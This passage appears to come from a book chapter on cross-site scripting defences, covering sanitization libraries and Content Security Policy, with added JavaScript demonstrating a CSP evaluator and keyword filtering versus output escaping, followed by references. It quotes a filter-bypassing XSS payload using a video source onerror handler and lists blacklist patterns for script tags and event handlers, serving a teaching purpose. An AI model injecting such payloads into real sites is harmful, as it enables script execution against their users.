It is another technique in hand to prevent against the XSS attack
[7, 10]. It is basically a process of cleaning the data or sanitizing
the data to make it secure from suspicious HTML tags or elements
like <scripts>. It ensures that the entered data is in the same for-
mat that is expected to be received for that particular input feld
in the web site. It is required in the case where the site can accept
input from the user with diverse content including HTML tags
or style felds. So sanitizing the data is a must to eliminate the
harmful efects. Tere are several libraries or directives available
to perform sanitization like HtmlSanitizer by OWASP, Ruby on
Rails SanitizeHelper, DOMpurify, PHP HTML purifer, Python
Bleach, and many more.
the user with various code injection vulnerabilities like the XSS. Hence, Mozilla proposed a security prototype named Content Security Policy (CSP) to mitigate various types of web application security vulnerabilities like the XSS [1]. It allows a web site developer to specify the location to retrieve the external resources on the web. Therefore, the browser is allowed to access only those resources that are whitelisted, ignoring all other domains of resources. Consequently, the injected scripts won’t get executed even if the attacker finds a way to inject them into the web site. However, it requires all the embedded JavaScript codes to be shifted to a separate file. Consequently, it demands modifications in the web application, which is a tedious task for the large web applications over the web. It also needs modification in both the web site and the web browser.
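To make the whitelisting concrete, the following JavaScript is an added example, not code from the book or from any browser's CSP implementation: a deliberately simplified evaluator for the script-src part of a CSP header that models only host sources, 'self', 'unsafe-inline' and the default-src fallback. The policy strings and origins are constructed for the example.

```javascript
// Added example (not from the book): a simplified evaluator for the script-src
// part of a Content-Security-Policy header. It models only host sources,
// 'self', 'unsafe-inline' and the default-src fallback; real browsers apply
// many more rules (paths, wildcards, nonces, hashes, 'strict-dynamic').

// Parse "directive source source; directive ..." into {directive: [sources]}.
function parseCsp(header) {
  const policy = {};
  for (const part of header.split(";")) {
    const [name, ...sources] = part.trim().split(/\s+/);
    if (name) policy[name.toLowerCase()] = sources;
  }
  return policy;
}

// script-src governs scripts; without it, default-src applies; without either
// the browser imposes no restriction on scripts (represented here as null).
function scriptSources(policy) {
  return policy["script-src"] || policy["default-src"] || null;
}

// Inline <script> blocks and on* handlers run only under 'unsafe-inline',
// which is why CSP pushes embedded JavaScript into separate files.
function inlineScriptAllowed(policy) {
  const sources = scriptSources(policy);
  return sources === null || sources.includes("'unsafe-inline'");
}

// A host source either carries a scheme ("https://cdn.example.com", compared
// as an origin) or is a bare host ("cdn.example.com", compared as a hostname).
function hostSourceMatches(source, scriptUrl) {
  const url = new URL(scriptUrl);
  return source.includes("://") ? url.origin === source : url.hostname === source;
}

// Is an external script at scriptUrl allowed on a page served from pageOrigin?
function externalScriptAllowed(policy, pageOrigin, scriptUrl) {
  const sources = scriptSources(policy);
  if (sources === null) return true;
  return sources.some((s) =>
    s === "'self'" ? new URL(scriptUrl).origin === pageOrigin
                   : !s.startsWith("'") && hostSourceMatches(s, scriptUrl));
}

// Constructed policy: only the page's own origin and one CDN may serve scripts.
const POLICY = parseCsp("default-src 'none'; script-src 'self' https://cdn.example.com");
```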
<video><source onerror="alert(1)"></video>
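The payload above slips past a keyword blacklist of the kind described in Section 6.2.1, while contextual escaping (Section 6.2.2) renders it inert. The following JavaScript is an added example, not code from the book; the blacklist patterns, escapeHtml, escapeCss and the rendersActiveHandler check are my own constructions, and the CSS escape uses the \HH form with a terminating space.

```javascript
// Added example (not from the book): a keyword blacklist filter (6.2.1) beside
// contextual output escaping (6.2.2), exercised on the <video><source onerror>
// payload quoted in the chapter.

// Constructed blacklist of the "harmful keywords" a naive input filter strips.
const BLACKLIST = [/<script\b[^>]*>/gi, /<\/script>/gi,
                   /\bon(click|activate|load)\s*=/gi, /javascript:/gi];

function keywordFilter(input) {
  return BLACKLIST.reduce((text, pattern) => text.replace(pattern, ""), input);
}

// HTML context: encode the six characters that can change markup structure.
const HTML_ESCAPES = { "&": "&amp;", "<": "&lt;", ">": "&gt;",
                       '"': "&quot;", "'": "&#x27;", "/": "&#x2F;" };
function escapeHtml(input) {
  return input.replace(/[&<>"'\/]/g, (c) => HTML_ESCAPES[c]);
}

// CSS context: \HH escape every character outside [a-zA-Z0-9]. The trailing
// space terminates the escape so following hex digits are not absorbed.
function escapeCss(input) {
  return input.replace(/[^a-zA-Z0-9]/g,
    (c) => "\\" + c.charCodeAt(0).toString(16).toUpperCase() + " ");
}

// Would the string, placed in an HTML body, still contain a tag carrying an
// on* event handler attribute? (The check an output filter would need.)
function rendersActiveHandler(html) {
  return /<[a-z][^>]*\son[a-z]+\s*=/i.test(html);
}

const PAYLOAD = '<video><source onerror="alert(1)"></video>'; // from the chapter
const LEGIT = "Set onclick= on the button in your own script"; // constructed

function demo() {
  return {
    filterBypassed: rendersActiveHandler(keywordFilter(PAYLOAD)), // true
    legitimateMangled: keywordFilter(LEGIT) !== LEGIT,            // true
    escapedIsInert: !rendersActiveHandler(escapeHtml(PAYLOAD)),   // true
  };
}
```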
REFERENCES
1. Content security policy. [online] Available at: https://developer.mo
zilla.org/en-US/docs/Web/HTTP/CSP.
2. Gupta, B. B. (ed.). (2018). Computer and Cyber Security: Principles,
Algorithm, Applications, and Perspectives. CRC Press.
3. Gupta, B. B., Gupta, S., & Chaudhary, P. (2017). Enhancing the
browser-side context-aware sanitization of suspicious HTML5
code for halting the DOM-based XSS vulnerabilities in cloud.
International Journal of Cloud Applications and Computing, 7(1),
1–31.
4. Gupta, B. B., & Sheng, Q. Z. (eds.). (2019). Machine Learning for
Computer and Cyber Security: Principle, Algorithms, and Practices.
CRC Press.
5. Gupta, S., & Gupta, B. B. (2015). BDS: Browser dependent XSS sani-
tizer. In Handbook of Research on Securing Cloud-Based Databases
with Biometric Applications (pp. 174–191). IGI Global.
6. Gupta, S., & Gupta, B. B. (2016). JS-SAN: Defense mechanism for
HTML5‐based web applications against JavaScript code injec-
tion vulnerabilities. Security and Communication Networks, 9(11),
1477–1495.
7. Gupta, S., Gupta, B. B., & Chaudhary, P. (2018). A client‐server
JavaScript code rewriting-based framework to detect the XSS
worms from online social network. Concurrency and Computation:
Practice and Experience, 31(21), e4646.
8. Jiang, F., Fu, Y., Gupta, B. B., Lou, F., Rho, S., Meng, F., & Tian,
Z. (2018). Deep learning based multi-channel intelligent attack
detection for data security. IEEE Transactions on Sustainable
Computing.
9. Sarmah, U., Bhattacharyya, D. K., & Kalita, J. K. (2018). A sur-
vey of detection methods for XSS attacks. Journal of Network and
Computer Applications, 118, 113–143.
10. Seth, F., Jeremiah, G., Robert, H., Anton, R., & Petko, D. P. (2011).
XSS Attacks: Cross Site Scripting Exploits and Defense. Elsevier.
11. Stergiou, C., Psannis, K. E., Xiflidis, T., Plageras, A. P., & Gupta,
B. B. (2018, April). Security and privacy of big data for social
networking services in cloud. In IEEE INFOCOM 2018-IEEE
Conference on Computer Communications Workshops (INFOCOM
WKSHPS) (pp. 438–443). IEEE.
12. Taha, T. A., & Karabatak, M. (2018, March). A proposed approach
for preventing cross-site scripting. In 2018 6th International
Symposium on Digital Forensic and Security (ISDFS) (pp. 1–4).
IEEE.
13. White hat security report. [online] Available at: https://info.wh
itehatsec.com/rs/675-YBI-674/images/WHS%202017%20Applic
ation%20Security%20Report%20FINAL.pdf.
14. XSS filter evasion cheat sheet. [online] Available at: https://ww
w.owasp.org/index.php/XSS_Filter_Evasion_Cheat_Sheet.
15. XSS prevention cheat sheet. [online] Available at: https://cheatsh
eetseries.owasp.org/cheatsheets/Cross_Site_Scripting_Prevent
ion_Cheat_Sheet.html.